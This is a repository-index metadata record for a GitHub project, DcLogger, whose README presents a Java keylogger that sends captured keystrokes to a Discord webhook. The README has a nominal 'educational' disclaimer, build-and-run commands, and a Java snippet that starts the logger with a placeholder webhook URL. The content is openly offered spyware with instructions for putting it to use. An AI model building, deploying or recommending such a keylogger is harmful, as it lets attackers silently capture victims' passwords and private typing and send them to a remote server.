{"id":25688829,"url":"https://github.com/lyzev/dclogger","last_synced_at":"2026-03-03T16:42:45.398Z","repository":{"id":107887438,"uuid":"468900970","full_name":"Lyzev/DcLogger","owner":"Lyzev","description":"A simple keylogger which sends the keys to a discord webhook.","archived":false,"fork":false,"pushed_at":"2023-02-04T14:31:09.000Z","size":2821,"stargazers_count":3,"open_issues_count":0,"forks_count":1,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-04-24T01:41:40.407Z","etag":null,"topics":["dclogger","discord","discord-webhook","discordwebhook","java","java17","keylogger","keylogger-discord-webhooks","keylogger-webhook","webhook"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"agpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Lyzev.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2022-03-11T21:11:07.000Z","updated_at":"2024-12-29T17:26:59.000Z","dependencies_parsed_at":null,"dependency_job_id":"07ba5bd3-4857-4f00-b372-c3b3fc15c808","html_url":"https://github.com/Lyzev/DcLogger","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Lyzev/DcLogger","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lyzev%2FDcLogger","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lyzev%2FDcLogger/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lyzev%2FDcLogger/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lyzev%2FDcLogger/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Lyzev","download_url":"https://codeload.github.com/Lyzev/DcLogger/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Lyzev%2FDcLogger/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30052132,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-03T15:26:47.567Z","status":"ssl_error","status_checked_at":"2026-03-03T15:26:17.132Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["dclogger","discord","discord-webhook","discordwebhook","java","java17","keylogger","keylogger-discord-webhooks","keylogger-webhook","webhook"],"created_at":"2025-02-24T21:06:03.216Z","updated_at":"2026-03-03T16:42:45.391Z","avatar_url":"https://github.com/Lyzev.png","language":"Java","readme":"\u003ch1 align=\"center\"\u003eDcLogger\u003c/h1\u003e\n\n\u003cp align=\"center\"\u003eA simple key logger application which sends the keys to a discord webhook implemented in Java.\u003c/p\u003e\n\n\u003cdiv align=\"center\"\u003e\n    \u003ca href=\"https://lyzev.github.io/discord/\"\u003e\u003cimg src=\"https://img.shields.io/discord/610120595765723137?logo=discord\" alt=\"Discord\"/\u003e\u003c/a\u003e\n    \u003cbr\u003e\u003cbr\u003e\n    \u003cimg src=\"https://img.shields.io/github/last-commit/Lyzev/DcLogger\" alt=\"GitHub last commit\"/\u003e\n    \u003cimg src=\"https://img.shields.io/github/commit-activity/w/Lyzev/DcLogger\" alt=\"GitHub commit activity\"/\u003e\n    \u003cbr\u003e\n    \u003cimg src=\"https://img.shields.io/github/languages/code-size/Lyzev/DcLogger\" alt=\"GitHub code size in bytes\"/\u003e\n    \u003cimg src=\"https://img.shields.io/github/contributors/Lyzev/DcLogger\" alt=\"GitHub contributors\"/\u003e\n\u003c/div\u003e\n\n## Disclaimer\nPlease note, this repository is for educational and proof of concept purposes only. The information and code contained within it should not be used for any illegal or unethical activities. The contributors to this repository are not liable for any actions taken or damages caused by the use of the information or code provided here. It is the responsibility of the user to ensure compliance with all applicable laws and regulations, and to obtain any necessary permissions before using the code or information.\n\n## Usage\n\n### How to Build and Run Project\nBuild project: \n```bash\nmvn package\n```\nRun ./target/DcLogger-jar-with-dependencies.jar file using command:\n```bash\njava -jar ./target/DcLogger-jar-with-dependencies.jar\n```\nThe keys will be sent to the provided webhook.\n\n### Example\n```java\n/**\n * This is an example on how to use {@link KeyLogger}.\n *\n * @throws MalformedURLException the exception is going to be thrown if the url is incorrect\n */\npublic static void main(String[] args) throws MalformedURLException {\n    KeyLogger logger = new KeyLogger(\"WEBHOOK-URL\"); // Declares and initializes the keylogger\n    logger.start(); // Registers the NativeLogger (If it isn't registered the event will not be called, so nothing would be logged)\n}\n```\n\n## Bugs and Suggestions\nBug reports and suggestions should be made in this repo's [issue tracker](https://github.com/Lyzev/DcLogger/issues) using the templates provided. Please provide as much information as you can to best help us understand your issue and give a better chance of it being resolved.\n\n## Credits\n* [vakho10](https://github.com/vakho10) for [java-keylogger](https://github.com/vakho10/java-keylogger)\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flyzev%2Fdclogger","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flyzev%2Fdclogger","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flyzev%2Fdclogger/lists"}